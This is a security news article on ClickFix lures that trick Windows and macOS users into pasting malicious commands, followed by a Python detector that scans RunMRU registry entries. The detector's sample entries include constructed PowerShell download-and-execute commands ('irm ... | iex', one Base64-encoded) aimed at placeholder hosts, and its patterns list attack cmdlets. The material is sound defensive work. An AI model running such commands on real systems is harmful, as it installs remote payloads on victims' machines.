Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices

In early 2024, cybersecurity researchers identified a sophisticated social engineering technique known as ClickFix, which has rapidly gained traction among threat actors. This deceptive method targets both Windows and macOS devices, tricking users into executing malicious commands under the guise of legitimate technical troubleshooting procedures.

The ClickFix technique operates by presenting users with fake error messages, CAPTCHA verifications, or human verification prompts that appear to require immediate action to resolve minor technical issues. These lures are typically delivered through phishing emails, malicious advertisements, or compromised websites that redirect victims to specially crafted landing pages.

The effectiveness of this attack lies in its exploitation of users’ natural tendency to solve apparent technical problems, making it particularly dangerous as it bypasses traditional automated security solutions through human interaction.

Microsoft analysts have identified multiple threat actors leveraging ClickFix attacks to deliver a diverse array of malicious payloads, including the prolific Lumma Stealer infostealer, remote access tools such as Xworm and AsyncRAT, loaders like Latrodectus and MintsLoader, and sophisticated rootkits including a modified version of the open-source r77.

These payloads typically operate as fileless malware, loaded directly into memory by living-off-the-land binaries rather than being written to disk as traditional executable files.

The attack chain begins when victims encounter visual lures that mimic legitimate services such as Cloudflare Turnstile verification, Google reCAPTCHA, or even social media platforms like Discord. When users interact with these fake verification systems, malicious JavaScript code executes in the background, copying obfuscated commands to the user’s clipboard using the `navigator.clipboard.writeText()` function.

Technical Implementation and Command Execution

The core of the ClickFix technique revolves around manipulating the Windows Run dialog box, accessed through the Windows key + R shortcut. Threat actors have strategically chosen this approach because most users are unfamiliar with this Windows component and its potential security implications.

The malicious commands typically involve PowerShell cmdlets such as `iwr` (Invoke-WebRequest), `irm` (Invoke-RestMethod), and `iex` (Invoke-Expression) to download and execute payloads from remote servers.

A notable case study involves the Lampion malware campaign first identified in May 2025, which targeted Portuguese organizations across government, finance, and transportation sectors. The campaign utilized a sophisticated multi-stage infection process beginning with phishing emails containing ZIP files. Upon opening, these archives contained HTML files that redirected users to a fake Portuguese tax authority website hosting the ClickFix lure.

The subsequent PowerShell command downloaded an obfuscated VBScript that created additional scripts in the Windows %TEMP% directory and established persistence through scheduled tasks.

The technique’s adaptability extends beyond Windows environments, with recent campaigns observed targeting macOS users to deliver Atomic macOS Stealer (AMOS). These attacks demonstrate the technique’s cross-platform capabilities, utilizing similar social engineering tactics while adapting the underlying commands for macOS terminal execution.

The macOS variant employed sophisticated password theft mechanisms, continuously prompting users for system passwords and utilizing the stolen credentials to bypass macOS security features through `xattr -c` commands.

Detection of ClickFix attacks relies on monitoring the RunMRU registry key, which maintains a history of Run dialog executions. Security teams can identify suspicious activity by examining entries containing living-off-the-land binaries, direct IP addresses, content delivery network domains, or files with suspicious extensions.

Microsoft’s research reveals that threat actors frequently employ obfuscation techniques including Base64 encoding, string concatenation, and escaped characters to evade detection systems.
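As an added detection example (not code from Microsoft's report or from any of the campaigns described), the following Python triages RunMRU entries for the indicators described above: living-off-the-land binaries, direct IP addresses, CDN hosts, suspicious script extensions, the `iwr`/`irm`/`iex` download-and-execute cmdlets, and Base64-encoded or concatenated/escaped commands. The indicator lists are illustrative assumptions to tune per environment, the sample entries are constructed, and a live collector would read the values under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`.

```python
import base64
import re
# Illustrative indicator lists (assumptions to tune per environment): LOLBins,
# script extensions and CDN host hints of the kind the article names for RunMRU.
LOLBINS = {"powershell", "pwsh", "mshta", "cmd", "wscript", "cscript", "certutil",
           "curl", "rundll32", "regsvr32", "bitsadmin", "msiexec"}
CDN_HINTS = ("cdn.", "workers.dev", "pages.dev")
ENC_RE = re.compile(r"-e\w*\s+([A-Za-z0-9+/=]{16,})")  # -e / -enc / -EncodedCommand
CMDLET_RE = re.compile(r"\b(iwr|irm|iex|invoke-(?:webrequest|restmethod|expression))\b")
IP_URL_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")
EXT_RE = re.compile(r"\.(hta|vbs|js|ps1|bat|cmd|scr)\b")
# Constructed sample; a live collector reads HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
ENCODED = base64.b64encode("irm http://example.invalid/a.hta | iex".encode("utf-16le")).decode()
SAMPLE_RUNMRU = {
    "MRUList": "cba",  # most recent first
    "a": "notepad\\1",  # Explorer appends "\1" to each entry
    "b": 'powershell -w hidden -c "irm http://203.0.113.5/v.txt | iex"\\1',
    "c": f"powershell -enc {ENCODED}\\1",  # base64 of UTF-16LE, as -EncodedCommand expects
}

def parse_runmru(values):
    """Yield (name, command) pairs in MRUList order with the "\\1" suffix stripped."""
    for name in values.get("MRUList", ""):
        if (data := values.get(name)) is not None:
            yield name, data[:-2] if data.endswith("\\1") else data

def analyse_command(cmd):
    """Return (reasons, decoded): triage tags plus decoded -EncodedCommand text, if any."""
    reasons, decoded = [], None
    low = cmd.lower().strip()
    exe = re.split(r"[\s\"']+", low.lstrip("\"'"))[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    if exe in LOLBINS:
        reasons.append(f"lolbin:{exe}")
    if m := ENC_RE.search(cmd):
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16le")
            reasons.append("base64-encoded-command")
        except (ValueError, UnicodeDecodeError):
            reasons.append("base64-undecodable")
    text = low + " " + (decoded.lower() if decoded else "")  # scan the decoded text as well
    checks = {"download-exec-cmdlet": CMDLET_RE.search(text), "direct-ip-url": IP_URL_RE.search(text),
              "suspicious-extension": EXT_RE.search(text), "cdn-host": any(h in text for h in CDN_HINTS),
              "concat-or-escape": "'+'" in text or "`" in text}
    reasons += [tag for tag, hit in checks.items() if hit]
    return reasons, decoded

def scan_runmru(values):
    """Flag RunMRU entries worth triage, most recent first."""
    return [{"entry": n, "command": c, "reasons": r, "decoded": d}
            for n, c in parse_runmru(values) for r, d in [analyse_command(c)] if r]
```

Running `scan_runmru(SAMPLE_RUNMRU)` flags entries `c` and `b` and leaves the benign `notepad` entry alone; the decoded field exposes the plaintext hidden behind the `-enc` argument so an analyst does not have to decode it by hand.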